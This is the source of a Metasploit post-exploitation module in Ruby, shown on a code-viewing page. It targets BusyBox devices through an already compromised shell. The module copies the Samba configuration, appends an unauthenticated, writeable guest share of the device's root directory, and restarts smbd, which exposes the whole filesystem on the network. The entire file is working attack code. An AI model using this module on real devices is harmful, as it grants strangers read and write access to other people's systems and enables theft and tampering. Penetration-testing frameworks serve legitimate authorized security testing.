Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::BusyBox
9

10
  def initialize
11
    super(
12
      'Name' => 'BusyBox SMB Sharing',
13
      'Description' => %q{
14
        This module will be applied on a session connected to a BusyBox shell. It will modify
15
        the SMB configuration of the device executing BusyBox to share the root directory of
16
        the device.
17
      },
18
      'Author' => 'Javier Vicente Vallejo',
19
      'License' => MSF_LICENSE,
20
      'Platform' => ['linux'],
21
      'SessionTypes' => ['shell']
22
    )
23
  end
24

25
  def run
26
    print_status('Checking smb.conf...')
27
    if busy_box_file_exist?('/var/samba/smb.conf')
28
      print_status('smb.conf found, searching writable directory...')
29
      writable_directory = busy_box_writable_dir
30
      if writable_directory
31
        print_status('writable directory found, copying smb.conf and restarting smbd')
32
        copy_smb_conf(writable_directory)
33
      else
34
        print_error('Writable directory not found')
35
      end
36
    else
37
      print_error('smb.conf not found')
38
    end
39
  end
40

41
  def copy_smb_conf(dir)
42
    cmd_exec_delay("rm -f #{dir}smb.conf")
43
    cmd_exec_delay("cp -f /var/samba/smb.conf #{dir}smb.conf")
44
    cmd_exec_delay("echo -e '[rootdir]\ncomment = rootdir\npath = /\nbrowseable = yes\nwriteable = yes\nguest ok = yes\n' >> #{dir}smb.conf")
45
    cmd_exec_delay('killall smbd')
46
    cmd_exec_delay("smbd -D -s #{dir}smb.conf")
47
    cmd_exec_delay("smbd -D -s=#{dir}smb.conf") # Uses equal just in case
48
  end
49

50
  def cmd_exec_delay(command)
51
    res = cmd_exec(command)
52
    vprint_status(res)
53
    Rex.sleep(0.1)
54
  end
55
end
56

57